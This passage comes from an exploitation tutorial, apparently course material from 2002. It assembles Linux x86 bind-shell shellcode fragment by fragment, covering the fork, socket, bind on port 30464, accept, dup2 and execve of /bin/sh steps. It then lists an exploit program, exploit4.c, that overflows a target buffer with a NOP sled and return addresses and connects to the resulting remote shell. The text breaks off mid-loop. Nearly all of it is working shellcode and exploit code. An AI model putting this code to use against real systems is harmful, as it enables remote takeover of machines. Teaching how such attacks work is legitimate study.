/* the first argument. */
"\xb0\x01" /* movb $0x1,%al */
"\x89\x46\x04" /* movl %eax,0x4(%esi) */
/* the second argument. */
"\xb0\x66" /* movb $0x66,%al */
"\xb3\x04" /* movb $0x4,%bl */
"\xcd\x80"; /* int $0x80 */
----------------------------------------------------------------------------
accept(soc,0,0); code
----------------------------------------------------------------------------
/* %ecx is a pointer of all arguments. */
char code[]=
"\x89\xf1" /* movl %esi,%ecx */
"\x89\x06" /* movl %eax,(%esi) */
/* %eax has to have soc value before using this */
/* instruction. */
/* the first argument. */
"\x31\xc0" /* xorl %eax,%eax */
"\x89\x46\x04" /* movl %eax,0x4(%esi) */
/* the second argument. */
"\x89\x46\x08" /* movl %eax,0x8(%esi) */
/* the third argument. */
"\xb0\x66" /* movb $0x66,%al */
"\xb3\x05" /* movb $0x5,%bl */
"\xcd\x80"; /* int $0x80 */
----------------------------------------------------------------------------
dup2(cli,0); code
----------------------------------------------------------------------------
/* the first argument is %ebx and the second argument */
/* is %ecx */
char code[]=
/* %eax has to have cli value before using this */
/* instruction. */
"\x88\xc3" /* movb %al,%bl */
"\xb0\x3f" /* movb $0x3f,%al */
"\x31\xc9" /* xorl %ecx,%ecx */
"\xcd\x80"; /* int $0x80 */
----------------------------------------------------------------------------
6.3 Modify the normal shellcode
Merging the code fragments above takes some work.
new shellcode
----------------------------------------------------------------------------
char shellcode[]=
"\x31\xc0" /* xorl %eax,%eax */
"\xb0\x02" /* movb $0x2,%al */
"\xcd\x80" /* int $0x80 */
"\x85\xc0" /* testl %eax,%eax */
"\x75\x43" /* jne 0x43 */
/* fork()!=0 case (the parent process) */
/* It will call exit(0). */
/* This takes two jumps, because exit(0) is too far */
/* away to reach with one short jump. */
"\xeb\x43" /* jmp 0x43 */
/* fork()==0 case (the child process) */
/* It will reach call -0xa5. */
/* This takes two jumps, because call -0xa5 is too */
/* far away to reach with one short jump. */
"\x5e" /* popl %esi */
"\x31\xc0" /* xorl %eax,%eax */
"\x31\xdb" /* xorl %ebx,%ebx */
"\x89\xf1" /* movl %esi,%ecx */
"\xb0\x02" /* movb $0x2,%al */
"\x89\x06" /* movl %eax,(%esi) */
"\xb0\x01" /* movb $0x1,%al */
"\x89\x46\x04" /* movl %eax,0x4(%esi) */
"\xb0\x06" /* movb $0x6,%al */
"\x89\x46\x08" /* movl %eax,0x8(%esi) */
"\xb0\x66" /* movb $0x66,%al */
"\xb3\x01" /* movb $0x1,%bl */
"\xcd\x80" /* int $0x80 */
"\x89\x06" /* movl %eax,(%esi) */
"\xb0\x02" /* movb $0x2,%al */
"\x66\x89\x46\x0c" /* movw %ax,0xc(%esi) */
"\xb0\x77" /* movb $0x77,%al */
"\x66\x89\x46\x0e" /* movw %ax,0xe(%esi) */
"\x8d\x46\x0c" /* leal 0xc(%esi),%eax */
"\x89\x46\x04" /* movl %eax,0x4(%esi) */
"\x31\xc0" /* xorl %eax,%eax */
"\x89\x46\x10" /* movl %eax,0x10(%esi) */
"\xb0\x10" /* movb $0x10,%al */
"\x89\x46\x08" /* movl %eax,0x8(%esi) */
"\xb0\x66" /* movb $0x66,%al */
"\xb3\x02" /* movb $0x2,%bl */
"\xcd\x80" /* int $0x80 */
"\xeb\x04" /* jmp 0x4 */
"\xeb\x55" /* jmp 0x55 */
"\xeb\x5b" /* jmp 0x5b */
"\xb0\x01" /* movb $0x1,%al */
"\x89\x46\x04" /* movl %eax,0x4(%esi) */
"\xb0\x66" /* movb $0x66,%al */
"\xb3\x04" /* movb $0x4,%bl */
"\xcd\x80" /* int $0x80 */
"\x31\xc0" /* xorl %eax,%eax */
"\x89\x46\x04" /* movl %eax,0x4(%esi) */
"\x89\x46\x08" /* movl %eax,0x8(%esi) */
"\xb0\x66" /* movb $0x66,%al */
"\xb3\x05" /* movb $0x5,%bl */
"\xcd\x80" /* int $0x80 */
"\x88\xc3" /* movb %al,%bl */
"\xb0\x3f" /* movb $0x3f,%al */
"\x31\xc9" /* xorl %ecx,%ecx */
"\xcd\x80" /* int $0x80 */
"\xb0\x3f" /* movb $0x3f,%al */
"\xb1\x01" /* movb $0x1,%cl */
"\xcd\x80" /* int $0x80 */
"\xb0\x3f" /* movb $0x3f,%al */
"\xb1\x02" /* movb $0x2,%cl */
"\xcd\x80" /* int $0x80 */
"\xb8\x2f\x62\x69\x6e" /* movl $0x6e69622f,%eax */
/* %eax="/bin" */
"\x89\x06" /* movl %eax,(%esi) */
"\xb8\x2f\x73\x68\x2f" /* movl $0x2f68732f,%eax */
/* %eax="/sh/" */
"\x89\x46\x04" /* movl %eax,0x4(%esi) */
"\x31\xc0" /* xorl %eax,%eax */
"\x88\x46\x07" /* movb %al,0x7(%esi) */
"\x89\x76\x08" /* movl %esi,0x8(%esi) */
"\x89\x46\x0c" /* movl %eax,0xc(%esi) */
"\xb0\x0b" /* movb $0xb,%al */
"\x89\xf3" /* movl %esi,%ebx */
"\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */
"\x8d\x56\x0c" /* leal 0xc(%esi),%edx */
"\xcd\x80" /* int $0x80 */
"\x31\xc0" /* xorl %eax,%eax */
"\xb0\x01" /* movb $0x1,%al */
"\x31\xdb" /* xorl %ebx,%ebx */
"\xcd\x80" /* int $0x80 */
"\xe8\x5b\xff\xff\xff"; /* call -0xa5 */
----------------------------------------------------------------------------
6.4 Exploit vulnerable4 program
With this shellcode, writing the exploit code is straightforward. You also
have to write code that connects to the socket.
exploit4.c
----------------------------------------------------------------------------
#include
#include
#include
#include
#include
#define ALIGN 0
#define OFFSET 0
#define RET_POSITION 1024
#define RANGE 20
#define NOP 0x90
char shellcode[]=
"\x31\xc0" /* xorl %eax,%eax */
"\xb0\x02" /* movb $0x2,%al */
"\xcd\x80" /* int $0x80 */
"\x85\xc0" /* testl %eax,%eax */
"\x75\x43" /* jne 0x43 */
"\xeb\x43" /* jmp 0x43 */
"\x5e" /* popl %esi */
"\x31\xc0" /* xorl %eax,%eax */
"\x31\xdb" /* xorl %ebx,%ebx */
"\x89\xf1" /* movl %esi,%ecx */
"\xb0\x02" /* movb $0x2,%al */
"\x89\x06" /* movl %eax,(%esi) */
"\xb0\x01" /* movb $0x1,%al */
"\x89\x46\x04" /* movl %eax,0x4(%esi) */
"\xb0\x06" /* movb $0x6,%al */
"\x89\x46\x08" /* movl %eax,0x8(%esi) */
"\xb0\x66" /* movb $0x66,%al */
"\xb3\x01" /* movb $0x1,%bl */
"\xcd\x80" /* int $0x80 */
"\x89\x06" /* movl %eax,(%esi) */
"\xb0\x02" /* movb $0x2,%al */
"\x66\x89\x46\x0c" /* movw %ax,0xc(%esi) */
"\xb0\x77" /* movb $0x77,%al */
"\x66\x89\x46\x0e" /* movw %ax,0xe(%esi) */
"\x8d\x46\x0c" /* leal 0xc(%esi),%eax */
"\x89\x46\x04" /* movl %eax,0x4(%esi) */
"\x31\xc0" /* xorl %eax,%eax */
"\x89\x46\x10" /* movl %eax,0x10(%esi) */
"\xb0\x10" /* movb $0x10,%al */
"\x89\x46\x08" /* movl %eax,0x8(%esi) */
"\xb0\x66" /* movb $0x66,%al */
"\xb3\x02" /* movb $0x2,%bl */
"\xcd\x80" /* int $0x80 */
"\xeb\x04" /* jmp 0x4 */
"\xeb\x55" /* jmp 0x55 */
"\xeb\x5b" /* jmp 0x5b */
"\xb0\x01" /* movb $0x1,%al */
"\x89\x46\x04" /* movl %eax,0x4(%esi) */
"\xb0\x66" /* movb $0x66,%al */
"\xb3\x04" /* movb $0x4,%bl */
"\xcd\x80" /* int $0x80 */
"\x31\xc0" /* xorl %eax,%eax */
"\x89\x46\x04" /* movl %eax,0x4(%esi) */
"\x89\x46\x08" /* movl %eax,0x8(%esi) */
"\xb0\x66" /* movb $0x66,%al */
"\xb3\x05" /* movb $0x5,%bl */
"\xcd\x80" /* int $0x80 */
"\x88\xc3" /* movb %al,%bl */
"\xb0\x3f" /* movb $0x3f,%al */
"\x31\xc9" /* xorl %ecx,%ecx */
"\xcd\x80" /* int $0x80 */
"\xb0\x3f" /* movb $0x3f,%al */
"\xb1\x01" /* movb $0x1,%cl */
"\xcd\x80" /* int $0x80 */
"\xb0\x3f" /* movb $0x3f,%al */
"\xb1\x02" /* movb $0x2,%cl */
"\xcd\x80" /* int $0x80 */
"\xb8\x2f\x62\x69\x6e" /* movl $0x6e69622f,%eax */
"\x89\x06" /* movl %eax,(%esi) */
"\xb8\x2f\x73\x68\x2f" /* movl $0x2f68732f,%eax */
"\x89\x46\x04" /* movl %eax,0x4(%esi) */
"\x31\xc0" /* xorl %eax,%eax */
"\x88\x46\x07" /* movb %al,0x7(%esi) */
"\x89\x76\x08" /* movl %esi,0x8(%esi) */
"\x89\x46\x0c" /* movl %eax,0xc(%esi) */
"\xb0\x0b" /* movb $0xb,%al */
"\x89\xf3" /* movl %esi,%ebx */
"\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */
"\x8d\x56\x0c" /* leal 0xc(%esi),%edx */
"\xcd\x80" /* int $0x80 */
"\x31\xc0" /* xorl %eax,%eax */
"\xb0\x01" /* movb $0x1,%al */
"\x31\xdb" /* xorl %ebx,%ebx */
"\xcd\x80" /* int $0x80 */
"\xe8\x5b\xff\xff\xff"; /* call -0xa5 */
unsigned long get_sp(void)
{
__asm__("movl %esp,%eax");
}
long getip(char *name)
{
struct hostent *hp;
long ip;
if((ip=inet_addr(name))==-1)
{
if((hp=gethostbyname(name))==NULL)
{
fprintf(stderr,"Can't resolve host.\n");
exit(0);
}
memcpy(&ip,(hp->h_addr),4);
}
return ip;
}
int exec_sh(int sockfd)
{
char snd[4096],rcv[4096];
fd_set rset;
while(1)
{
FD_ZERO(&rset);
FD_SET(fileno(stdin),&rset);
FD_SET(sockfd,&rset);
select(255,&rset,NULL,NULL,NULL);
if(FD_ISSET(fileno(stdin),&rset))
{
memset(snd,0,sizeof(snd));
fgets(snd,sizeof(snd),stdin);
write(sockfd,snd,strlen(snd));
}
if(FD_ISSET(sockfd,&rset))
{
memset(rcv,0,sizeof(rcv));
if(read(sockfd,rcv,sizeof(rcv))<=0)
exit(0);
fputs(rcv,stdout);
}
}
}
int connect_sh(long ip)
{
int sockfd,i;
struct sockaddr_in sin;
printf("Connect to the shell\n");
fflush(stdout);
memset(&sin,0,sizeof(sin));
sin.sin_family=AF_INET;
sin.sin_port=htons(30464);
sin.sin_addr.s_addr=ip;
if((sockfd=socket(AF_INET,SOCK_STREAM,0))<0)
{
printf("Can't create socket\n");
exit(0);
}
if(connect(sockfd,(struct sockaddr *)&sin,sizeof(sin))<0)
{
printf("Can't connect to the shell\n");
exit(0);
}
return sockfd;
}
void main(int argc,char **argv)
{
char buff[RET_POSITION+RANGE+ALIGN+1],*ptr;
long addr;
unsigned long sp;
int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1;
int i;
int sockfd;
if(argc>1)
offset=atoi(argv[1]);
sp=get_sp();
addr=sp-offset;
for(i=0;i>8;
buff[i+ALIGN+2]=(addr&0x00ff0000)>>16;
buff[i+ALIGN+3]=(addr&0xff000000)>>24;
}
for(i=0;i
© 2002 T. P. Baker & Florida State University.
No part of this publication may be reproduced, stored in a retrieval system, or
transmitted in any form or by any means without written permission.
(Last updated by $Author: cop4610 $ on $Date: 2002/09/02 20:27:19 $.)